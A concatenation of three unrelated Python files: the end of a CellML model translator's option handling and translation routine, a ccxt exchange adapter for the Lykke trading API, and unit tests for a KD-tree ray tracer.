group = optparse.OptionGroup(parser, 'Functional Curation options', "Options specific to use by Functional Curation")
def protocol_callback(option, opt_str, value, parser):
"""
Protocols don't always produce normal cardiac cell models.
However, we want to allow a later option to override these changes.
"""
parser.values.protocol = value
parser.values.convert_interfaces = False
parser.values.use_chaste_stimulus = False
group.add_option('--protocol',
action='callback', callback=protocol_callback, type='string', nargs=1,
help="specify a simulation protocol to apply to the model prior to translation")
group.add_option('--protocol-options', action='store', type='string',
help="extra options for the protocol")
group.add_option('--expose-named-parameters',
action='store_true', default=False,
help="expose all constant variables with 'name' annotations for access as model parameters")
parser.add_option_group(group)
# Settings for lookup tables
group = optparse.OptionGroup(parser, 'Lookup tables options', "Options specific to the lookup tables optimisation")
lookup_type_choices = ['entry-below', 'nearest-neighbour', 'linear-interpolation']
group.add_option('--lookup-type', choices=lookup_type_choices,
default='linear-interpolation',
help="the type of table lookup to perform [default: %default]."
" Choices: " + str(lookup_type_choices))
group.add_option('--no-separate-lut-class', dest='separate_lut_class',
action='store_false', default=True,
help="don't put lookup tables in a separate class")
group.add_option('--row-lookup-method',
action='store_true', default=True,
help="add and use a method to look up a whole row of a table")
group.add_option('--no-row-lookup-method', dest='row_lookup_method',
action='store_false',
help="don't add and use a method to look up a whole row of a table")
group.add_option('--combine-commutative-tables',
action='store_true', default=False,
help="optimise a special corner case to reduce the number of tables."
" See documentation for details.")
group.add_option('--lt-index-uses-floor',
action='store_true', default=False,
help="use floor() to calculate LT indices, instead of just casting")
group.add_option('--constrain-table-indices',
action='store_true', default=False,
help="constrain lookup table index variables to remain within the bounds specified,"
" rather than throwing an exception if they go outside the bounds")
group.add_option('--no-check-lt-bounds', dest='check_lt_bounds',
action='store_false', default=True,
help="[unsafe] don't check for LT indexes going outside the table bounds")
parser.add_option_group(group)
# Settings for partial evaluation
group = optparse.OptionGroup(parser, 'Partial evaluation options', "Options specific to the partial evaluation optimisation")
group.add_option('--pe-convert-power',
action='store_true', default=False,
help="convert pow(x,3) to x*x*x; similarly for powers 2 & 4.")
group.add_option('--no-partial-pe-commutative', dest='partial_pe_commutative',
action='store_false', default=True,
help="don't combine static operands of dynamic commutative associative applys")
group.add_option('--no-pe-instantiate-tables', dest='pe_instantiate_tables',
action='store_false', default=True,
help="don't instantiate definitions that will be tables regardless of usage")
parser.add_option_group(group)
options, args = parser.parse_args(args, values=default_options)
if len(args) != 1:
parser.error("exactly one input CellML file must be specified")
# Some options imply others
if options.debug_source:
options.debug = True
if options.do_jacobian_analysis:
options.translate_type = 'Maple'
options.maple_output = False
options.rush_larsen = False
options.backward_euler = False
if options.backward_euler:
if not options.maple_output:
parser.error("Backward Euler code generation requires maple output (-j)")
options.rush_larsen = False
options.grl1 = False
options.grl2 = False
if options.rush_larsen or options.backward_euler or options.grl1 or options.grl2:
options.translate_type = 'Chaste'
if options.use_data_clamp and not options.translate_type=='CVODE':
parser.error("Data clamp option '--use-data-clamp' also requires CVODE ('-t CVODE'). If you are calling this via ConvertCellModel use '--cvode-data-clamp'.")
# Numba may not be available
if options.numba:
try:
import numba
except:
options.numba = False
return options, args[0]
def load_model(model_file, options):
"""Load and validate a CellML model."""
# Setup logging
logging.thread = None # Hack: we're not multi-threaded, so be slightly quicker...
if options.debug:
formatter = logging.Formatter(fmt="%(name)s: %(message)s")
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(formatter)
handler.addFilter(OnlyDebugFilter())
if options.debug_source:
handler.addFilter(OnlyTheseSourcesFilter(options.debug_source))
logging.getLogger().addHandler(handler)
logging.getLogger().setLevel(logging.DEBUG)
# We can't translate if some warnings occur, as well as if the
# model is invalid
notifier = NotifyHandler(level=logging.WARNING_TRANSLATE_ERROR)
logging.getLogger('validator').addHandler(notifier)
v = validator.CellMLValidator(create_relaxng_validator=not options.assume_valid)
valid, doc = v.validate(model_file, return_doc=True, show_warnings=not options.quiet,
check_for_units_conversions=options.warn_on_unit_conversions,
warn_on_units_errors=options.warn_on_units_errors,
assume_valid=options.assume_valid)
v.quit()
del v
if not valid or notifier.messages:
print >>sys.stderr, model_file,
if not valid:
print >>sys.stderr, "is not a valid CellML file"
else:
print >>sys.stderr, "contains untranslatable constructs"
sys.exit(1)
return doc
def run():
"""Translate the file given on the command line."""
options, model_file = get_options(sys.argv[1:])
doc = load_model(model_file, options)
DEBUG('translate', "+++ Loaded model")
config = ConfigurationStore(doc, options=options)
for config_file in options.config_file:
config.read_configuration_file(config_file)
DEBUG('translate', "+++ Read config")
# Apply protocol, if given
if options.protocol:
import protocol
protocol.apply_protocol_file(doc, options.protocol)
if options.debug:
post_proto_cellml = options.outfilename or model_file
post_proto_cellml = os.path.splitext(post_proto_cellml)[0] + '-proto.cellml.ppp'
stream = open_output_stream(post_proto_cellml)
doc.xml(indent=u'yes', stream=stream)
close_output_stream(stream)
DEBUG('translate', "+++ Applied protocol")
config.finalize_config()
DEBUG('translate', "+++ Processed config")
solver_info = SolverInfo(doc.model)
# Generate an interface component, if desired
translator_klass = CellMLTranslator.translators[options.translate_type]
if not options.protocol:
translator_klass.generate_interface(doc, solver_info)
config.validate_metadata(options.assume_valid)
DEBUG('translate', "+++ Generated interface")
if options.lut:
config.find_lookup_variables()
DEBUG('translate', "+++ Found LT keys")
# These bits could do with improving, as they annotate more than is really needed!
if options.pe:
# We need to ensure PE doesn't remove ionic currents needed for GetIIonic
config.annotate_currents_for_pe()
# "Need" to ensure pe doesn't remove metadata-annotated variables (when using modifiers or default stimulus?)
config.annotate_metadata_for_pe()
DEBUG('translate', "+++ Annotated variables")
# Deal with the 'expose' options
config.expose_variables()
class_name = options.class_name
if not class_name:
class_name = doc.model.name.replace('-', '_')
if options.augment_class_name:
class_name = u'CML_' + class_name
if options.pe:
class_name += '_pe'
if options.lut:
class_name += '_lut'
if options.backward_euler:
class_name += '_be'
if options.use_modifiers:
class_name += '_sens'
if options.protocol:
# Try to avoid OdeSystemInformation conflicts
class_name += "_Proto_" + os.path.splitext(os.path.basename(options.protocol))[0]
output_filename = getattr(options, 'outfilename', None)
if not options.translate and not output_filename:
output_filename = 'stdout'
if options.units_conversions:
doc.model.add_units_conversions()
DEBUG('translate', "+++ Added units conversions")
if options.do_jacobian_analysis:
lin = optimize.LinearityAnalyser()
lin.analyse_for_jacobian(doc, V=config.V_variable)
DEBUG('translate', "+++ Analysed model for Jacobian")
if options.maple_output:
# Parse Jacobian matrix
from maple_parser import MapleParser
mp = MapleParser()
jacobian_file = file(options.maple_output) # TODO: Error checking
doc.model._cml_jacobian = mp.parse(jacobian_file)
doc.model._cml_jacobian_full = mp.JacobianWasFullSize
jacobian_file.close()
if not options.backward_euler and doc.model._cml_jacobian_full:
# Add full jacobian to XML
solver_info.add_jacobian_matrix()
solver_info.add_variable_links()
if options.backward_euler:
# Rearrange linear ODEs
lin = optimize.LinearityAnalyser()
lin.analyse_for_jacobian(doc, V=config.V_variable)
lin.rearrange_linear_odes(doc)
# Remove jacobian entries that don't correspond to nonlinear state variables
jacobian = doc.model._cml_jacobian
if isinstance(jacobian, tuple):
assert doc.model._cml_jacobian_full
jacobian = jacobian[1]
nonlinear_vars = set([v.get_source_variable(recurse=True) for v in doc.model._cml_nonlinear_system_variables])
def gv(vname):
return cellml_variable.get_variable_object(doc.model, vname).get_source_variable(recurse=True)
for var_i, var_j in jacobian.keys():
if gv(var_i) not in nonlinear_vars or gv(var_j) not in nonlinear_vars:
del jacobian[(var_i, var_j)]
if doc.model._cml_jacobian_full:
# Transform the Jacobian into the form needed by the Backward Euler code
import maple_parser
for key, expr in jacobian.iteritems():
new_expr = None
if key[0] == key[1]:
# 1 on the diagonal
new_expr = maple_parser.MNumber(['1'])
if not (isinstance(expr, maple_parser.MNumber) and str(expr) == '0'):
# subtract delta_t * expr
args = []
if new_expr:
args.append(new_expr)
args.append(maple_parser.MOperator([maple_parser.MVariable(['delta_t']), expr], 'prod', 'times'))
new_expr = maple_parser.MOperator(args, '', 'minus')
if new_expr:
jacobian[key] = new_expr
# Add info as XML
solver_info.add_all_info()
# Analyse the XML, adding cellml_variable references, etc.
solver_info.add_variable_links()
solver_info.add_linear_ode_update_equations()
DEBUG('translate', "+++ Parsed and incorporated Maple output")
else:
options.include_dt_in_tables = False
if options.lut:
# Create the analyser so PE knows which variables are table keys
lut = optimize.LookupTableAnalyser()
else:
lut = None
if options.pe:
# Do partial evaluation
pe = optimize.PartialEvaluator()
pe.parteval(doc, solver_info, lut)
DEBUG('translate', "+++ Done PE")
if options.lut:
# Do the lookup table analysis
lut.analyse_model(doc, solver_info)
DEBUG('translate', "+++ Done LT analysis")
if options.rush_larsen:
rl = optimize.RushLarsenAnalyser()
rl.analyse_model(doc)
DEBUG('translate', "+++ Done Rush-Larsen analysis")
if options.translate:
# Translate to code
initargs = {'add_timestamp': not options.no_timestamp,
'options': options}
transargs = {'v_variable': config.V_variable}
transargs['row_lookup_method'] = options.row_lookup_method
transargs['lt_index_uses_floor'] = options.lt_index_uses_floor
transargs['constrain_table_indices'] = options.constrain_table_indices
if issubclass(translator_klass, CellMLToMapleTranslator):
initargs['omit_constants'] = options.omit_constants
initargs['compute_full_jacobian'] = options.compute_full_jacobian
elif issubclass(translator_klass, CellMLToChasteTranslator):
solver_info.add_membrane_ionic_current()
transargs['use_chaste_stimulus'] = options.use_chaste_stimulus
transargs['separate_lut_class'] = options.separate_lut_class
transargs['convert_interfaces'] = options.convert_interfaces
transargs['use_modifiers'] = options.use_modifiers
transargs['use_data_clamp'] = options.use_data_clamp
transargs['dynamically_loadable'] = options.dynamically_loadable
transargs['use_protocol'] = bool(options.protocol)
t = translator_klass(**initargs)
t.translate(doc, model_file, output_filename, class_name=class_name, **transargs)
cellml_metadata.remove_model(doc.model)
else:
# Add a comment element
comment = pycml.comment_base(
body=u'\n' + version_comment(not options.no_timestamp) + u'\n')
doc.xml_insert_before(doc.model, comment)
# Output annotated model
stream = open_output_stream(output_filename)
doc.xml(indent=u'yes', stream=stream)
close_output_stream(stream)
DEBUG('translate', "+++ Done translation")
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
class lykke (Exchange):
def describe(self):
return self.deep_extend(super(lykke, self).describe(), {
'id': 'lykke',
'name': 'Lykke',
'countries': 'CH',
'version': 'v1',
'rateLimit': 200,
'has': {
'CORS': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchOrders': True,
},
'requiredCredentials': {
'apiKey': True,
'secret': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/34487620-3139a7b0-efe6-11e7-90f5-e520cef74451.jpg',
'api': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-api.lykke.com/api',
'private': 'https://hft-api.lykke.com/api',
'test': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-service-dev.lykkex.net/api',
'private': 'https://hft-service-dev.lykkex.net/api',
},
},
'www': 'https://www.lykke.com',
'doc': [
'https://hft-api.lykke.com/swagger/ui/',
'https://www.lykke.com/lykke_api',
],
'fees': 'https://www.lykke.com/trading-conditions',
},
'api': {
'mobile': {
'get': [
'AllAssetPairRates/{market}',
],
},
'public': {
'get': [
'AssetPairs',
'AssetPairs/{id}',
'IsAlive',
'OrderBooks',
'OrderBooks/{AssetPairId}',
],
},
'private': {
'get': [
'Orders',
'Orders/{id}',
'Wallets',
],
'post': [
'Orders/limit',
'Orders/market',
'Orders/{id}/Cancel',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.0, # as of 7 Feb 2018, see https://github.com/ccxt/ccxt/issues/1863
'taker': 0.0, # https://www.lykke.com/cp/wallet-fees-and-limits
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {
'BTC': 0.001,
},
'deposit': {
'BTC': 0,
},
},
},
})
def fetch_balance(self, params={}):
self.load_markets()
balances = self.privateGetWallets()
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currency = balance['AssetId']
total = balance['Balance']
used = balance['Reserved']
free = total - used
result[currency] = {
'free': free,
'used': used,
'total': total,
}
return self.parse_balance(result)
def cancel_order(self, id, symbol=None, params={}):
return self.privatePostOrdersIdCancel({'id': id})
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
query = {
'AssetPairId': market['id'],
'OrderAction': self.capitalize(side),
'Volume': amount,
}
if type == 'market':
query['Asset'] = market['base'] if (side == 'buy') else market['quote']
elif type == 'limit':
query['Price'] = price
method = 'privatePostOrders' + self.capitalize(type)
result = getattr(self, method)(self.extend(query, params))
return {
'id': None,
'info': result,
}
def fetch_markets(self):
markets = self.publicGetAssetPairs()
result = []
for i in range(0, len(markets)):
market = markets[i]
id = market['Id']
base = market['BaseAssetId']
quote = market['QuotingAssetId']
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = market['Name']
precision = {
'amount': market['Accuracy'],
'price': market['InvertedAccuracy'],
}
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': True,
'info': market,
'lot': math.pow(10, -precision['amount']),
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision['amount']),
'max': math.pow(10, precision['amount']),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': math.pow(10, precision['price']),
},
},
})
return result
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
symbol = None
if market:
symbol = market['symbol']
ticker = ticker['Result']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['Rate']['Bid']),
'ask': float(ticker['Rate']['Ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': None,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.mobileGetAllAssetPairRatesMarket(self.extend({
'market': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_order_status(self, status):
if status == 'Pending':
return 'open'
elif status == 'InOrderBook':
return 'open'
elif status == 'Processing':
return 'open'
elif status == 'Matched':
return 'closed'
elif status == 'Cancelled':
return 'canceled'
elif status == 'NotEnoughFunds':
return 'NotEnoughFunds'
elif status == 'NoLiquidity':
return 'NoLiquidity'
elif status == 'UnknownAsset':
return 'UnknownAsset'
elif status == 'LeadToNegativeSpread':
return 'LeadToNegativeSpread'
return status
def parse_order(self, order, market=None):
status = self.parse_order_status(order['Status'])
symbol = None
if not market:
if 'AssetPairId' in order:
if order['AssetPairId'] in self.markets_by_id:
market = self.markets_by_id[order['AssetPairId']]
if market:
symbol = market['symbol']
timestamp = None
if 'LastMatchTime' in order:
timestamp = self.parse8601(order['LastMatchTime'])
elif 'Registered' in order:
timestamp = self.parse8601(order['Registered'])
elif 'CreatedAt' in order:
timestamp = self.parse8601(order['CreatedAt'])
price = self.safe_float(order, 'Price')
amount = self.safe_float(order, 'Volume')
remaining = self.safe_float(order, 'RemainingVolume')
filled = amount - remaining
cost = filled * price
result = {
'info': order,
'id': order['Id'],
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'price': price,
'cost': cost,
'average': None,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
}
return result
def fetch_order(self, id, symbol=None, params={}):
response = self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders()
return self.parse_orders(response, None, since, limit)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'InOrderBook',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'Matched',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
response = self.publicGetOrderBooksAssetPairId(self.extend({
'AssetPairId': self.market_id(symbol),
}, params))
orderbook = {
'timestamp': None,
'bids': [],
'asks': [],
}
timestamp = None
for i in range(0, len(response)):
side = response[i]
if side['IsBuy']:
orderbook['bids'] = self.array_concat(orderbook['bids'], side['Prices'])
else:
orderbook['asks'] = self.array_concat(orderbook['asks'], side['Prices'])
timestamp = self.parse8601(side['Timestamp'])
if not orderbook['timestamp']:
orderbook['timestamp'] = timestamp
else:
orderbook['timestamp'] = max(orderbook['timestamp'], timestamp)
if not timestamp:
timestamp = self.milliseconds()
return self.parse_order_book(orderbook, orderbook['timestamp'], 'bids', 'asks', 'Price', 'Volume')
def parse_bid_ask(self, bidask, priceKey=0, amountKey=1):
price = float(bidask[priceKey])
amount = float(bidask[amountKey])
if amount < 0:
amount = -amount
return [price, amount]
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
self.check_required_credentials()
headers = {
'api-key': self.apiKey,
'Accept': 'application/json',
'Content-Type': 'application/json',
}
if method == 'POST':
if params:
body = self.json(params)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
|
from unittest import TestCase, skip
import copy
import numpy as np
from giant import rotations as at
from giant.ray_tracer import kdtree, shapes, rays
class TestKDTree(TestCase):
def setUp(self):
self.max_depth = 4
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1,
np.arange(12).reshape(-1, 3))
self.shapes = self.triangles
self.stacked_tries = shapes.Triangle64(np.hstack([tri1, tri2,
tri1+[[0], [0], [2.5]],
tri2 + [[0], [0], [2.5]]]).T, 1,
np.arange(12).reshape(-1, 3))
def test_creation(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
self.assertEqual(tree.max_depth, self.max_depth)
self.assertEqual(tree.surface, self.shapes)
def test_build(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
facets = np.arange(12).reshape(-1, 3)
tris = [shapes.Triangle64(self.triangles.vertices, self.triangles.albedos, face)
for face in facets]
for tri in tris:
tri.bounding_box = None
node20 = kdtree.KDNode(tris[0])
node21 = kdtree.KDNode(tris[1])
node22 = kdtree.KDNode(tris[2])
node23 = kdtree.KDNode(tris[3])
node10 = kdtree.KDNode()
node10.bounding_box = shapes.AxisAlignedBoundingBox([-5, 0, 0], [-1.5, 1, 0])
node10.left = node20
node10.right = node21
node11 = kdtree.KDNode()
node11.bounding_box = shapes.AxisAlignedBoundingBox([0., 0, 0], [3.5, 1, 0])
node11.left = node22
node11.right = node23
node00 = kdtree.KDNode()
node00.bounding_box = self.triangles.bounding_box
node00.left = node10
node00.right = node11
node00.order = 0
self.assertEqual(node00, tree.root)
def test_trace(self):
with self.subTest(stacked=False):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, 0.5, 3],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 1, 1]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.left.right, tree.root.right.left, tree.root.right.right]
with self.subTest(rotation=None, translation=None):
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertFalse(int_check["check"])
self.assertTrue(np.isnan(int_check["intersect"]).all())
self.assertTrue(np.isnan(int_check["normal"]).all())
self.assertTrue(np.isnan(int_check["albedo"]))
self.assertEqual(int_check["facet"], -1)
rotation = at.Rotation([0, 0, -np.pi / 2])
rays_test.ignore = None
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [0, 0, -0.5]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1.5])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(rotation=rotation, translation=translation):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1.5])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
rotation = at.Rotation([np.pi / 2, 0, 0])
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [2.5, 0, 0]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"][0])
for ind, int_check in enumerate(ints[1:]):
ind += 1
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind-1])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind-1].id*(10**(tc.root.order+1)))
translation = [0, -0.5, 0]
with self.subTest(rotation=rotation, translation=translation):
with self.subTest(order='rt'):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1.5, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(order='tr'):
tc = copy.deepcopy(tree)
tc.translate(translation)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0, 0, 0, 0]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(stacked=True):
tree = kdtree.KDTree(self.stacked_tries, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, -4.5, -2],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 5, 5]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.right.left, tree.root.left.right, tree.root.right.right]
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[0].id*(10**(tree.root.order+1)))
class TestKDNode(TestCase):
def setUp(self):
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1, np.arange(12).reshape(-1, 3))
def test_creation(self):
node = kdtree.KDNode(surface=self.triangles)
self.assertEqual(node.surface, self.triangles)
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
self.assertIsNone(node.left)
self.assertIsNone(node.right)
def test_compute_bounding_box(self):
node = kdtree.KDNode()
node.surface = self.triangles
node.has_surface = True
node.compute_bounding_box()
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
def test_split(self):
node = kdtree.KDNode(surface=self.triangles)
node.split(force=True, print_progress=False)
